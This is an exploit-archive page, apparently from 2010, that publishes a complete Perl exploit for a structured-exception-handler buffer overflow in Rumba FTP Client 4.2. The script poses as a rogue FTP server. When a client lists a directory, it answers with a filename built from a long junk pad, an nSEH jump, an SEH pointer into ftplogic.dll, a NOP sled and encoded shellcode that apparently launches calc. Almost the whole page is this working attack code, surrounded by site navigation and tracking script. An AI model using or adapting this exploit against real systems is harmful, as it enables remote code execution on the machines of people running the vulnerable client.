Home / os / win7

Rumba ftp Client 4.2 PASV BoF (SEH)

Posted on 25 April 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>Rumba ftp Client 4.2 PASV BoF (SEH)</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===================================
Rumba ftp Client 4.2 PASV BoF (SEH)
===================================

# Exploit Title: Rumba ftp Client 4.2 PASV BoF (SEH)
# Date: 2010-04-24
# Author: zombiefx &amp; corelanc0d3r
# Email: darkernet[at]gmail.com
# Software Link: http://download.cnet.com/Rumba-FTP/3000-2160_4-10587778.html
# Version: Rumba ftp client 4.2
# Tested on: Windows XP SP3
# SEH overwrite occurs when sending the directory listing to the client with an
# overly long filename extension.*Note version 4.2.3 might also suffer from this.
# released without the blessing of corelanc0d3r :(
# Usage: ./rumbaftp_exploit
# Code:
#!/usr/bin/perl
use warnings;
use strict;
use IO::Socket;
my $sock = IO::Socket::INET-&gt;new( LocalPort =&gt; '21', Proto =&gt; 'tcp', Listen =&gt; '1' )
  or die &quot;Socket Not Created $!
&quot;;
print 
      &quot;#############################################################
&quot;
    . &quot;#              Rumba ftp Client 4.2 PASV BoF (SEH)          #
&quot;
    . &quot;#                By: zombiefx &amp; corelanc0d3r                #
&quot;
    . &quot;#         Listening on port 21 with pasv port of 31337      #
&quot;
    . &quot;#############################################################
&quot;;
my $pasvip = &quot;127,0,0,1&quot;;
while ( my $data = $sock-&gt;accept() ) {
    print &quot;Client Connected!
Awaiting Ftp commands: 
&quot;;
    print $data &quot;220 Gangsta Rap Made Me Do It
&quot;;
    while (&lt;$data&gt;) {
        print;
        print $data &quot;331 Anonymous access allowed
&quot;                        if (/USER/i);
        print $data &quot;230-Welcome to N0 M4Ns l4nd.
230 User logged in.
&quot; if (/PASS/i);
        print $data &quot;215 UNIX Type: L8 
&quot;                                  if (/SYST/i);
        print $data &quot;257 &quot;/&quot; is current directory.
&quot;                     if (/PWD/i);
        print $data &quot;200 Type set to I.
&quot;                                  if (/TYPE I/i);
        print $data &quot;200 Type set to A.
&quot;                                  if (/TYPE A/i);
        print $data &quot;214 Syntax: SITE - (site-specific commands)
&quot;         if (/HELP/i);
        print $data &quot;227 Entering Passive Mode ($pasvip,122,105)
&quot;         if (/PASV/i);

        if (/LIST/i) {
            print $data &quot;150 Here comes the directory listing.
&quot; . &quot;226 Directory send OK.
&quot;;
            &amp;senddata( '122', '105' );
        }

    }
    print &quot;Payload delivered check the client!
&quot;;
}

sub senddata {
    my $port     = $_[0] * 256  + $_[1];
    my $pasvsock = IO::Socket::INET-&gt;new( LocalPort =&gt; $port, Proto =&gt; 'tcp', Listen =&gt; '1' );
    my $pasvdata = $pasvsock-&gt;accept();
    my $junk    = &quot;x77&quot; x 1351;
    my $seh  = pack( 'V', 0x1006E534 );# located in ftplogic.dll
    my $nseh = &quot;xebx06x90x90&quot;;
    my $nops = &quot;x90&quot; x 50;
    my $calcshell =
        &quot;x89xe2xdaxc1xd9x72xf4x58x50x59x49x49x49x49&quot;
      . &quot;x43x43x43x43x43x43x51x5ax56x54x58x33x30x56&quot;
      . &quot;x58x34x41x50x30x41x33x48x48x30x41x30x30x41&quot;
      . &quot;x42x41x41x42x54x41x41x51x32x41x42x32x42x42&quot;
      . &quot;x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx4a&quot;
      . &quot;x48x50x44x43x30x43x30x45x50x4cx4bx47x35x47&quot;
      . &quot;x4cx4cx4bx43x4cx43x35x43x48x45x51x4ax4fx4c&quot;
      . &quot;x4bx50x4fx42x38x4cx4bx51x4fx47x50x43x31x4a&quot;
      . &quot;x4bx51x59x4cx4bx46x54x4cx4bx43x31x4ax4ex50&quot;
      . &quot;x31x49x50x4cx59x4ex4cx4cx44x49x50x43x44x43&quot;
      . &quot;x37x49x51x49x5ax44x4dx43x31x49x52x4ax4bx4a&quot;
      . &quot;x54x47x4bx51x44x46x44x43x34x42x55x4bx55x4c&quot;
      . &quot;x4bx51x4fx51x34x45x51x4ax4bx42x46x4cx4bx44&quot;
      . &quot;x4cx50x4bx4cx4bx51x4fx45x4cx45x51x4ax4bx4c&quot;
      . &quot;x4bx45x4cx4cx4bx45x51x4ax4bx4dx59x51x4cx47&quot;
      . &quot;x54x43x34x48x43x51x4fx46x51x4bx46x43x50x50&quot;
      . &quot;x56x45x34x4cx4bx47x36x50x30x4cx4bx51x50x44&quot;
      . &quot;x4cx4cx4bx44x30x45x4cx4ex4dx4cx4bx45x38x43&quot;
      . &quot;x38x4bx39x4ax58x4cx43x49x50x42x4ax50x50x42&quot;
      . &quot;x48x4cx30x4dx5ax43x34x51x4fx45x38x4ax38x4b&quot;
      . &quot;x4ex4dx5ax44x4ex46x37x4bx4fx4dx37x42x43x45&quot;
      . &quot;x31x42x4cx42x43x45x50x41x41&quot;;

    my $payload = $junk . $nseh . $seh . $nops . $calcshell;

    print $pasvdata
      &quot;-rw-rw-r--    1 1176     1176         1060 Apr 23 23:17  test.$payload

&quot;;
}


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-04-25]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :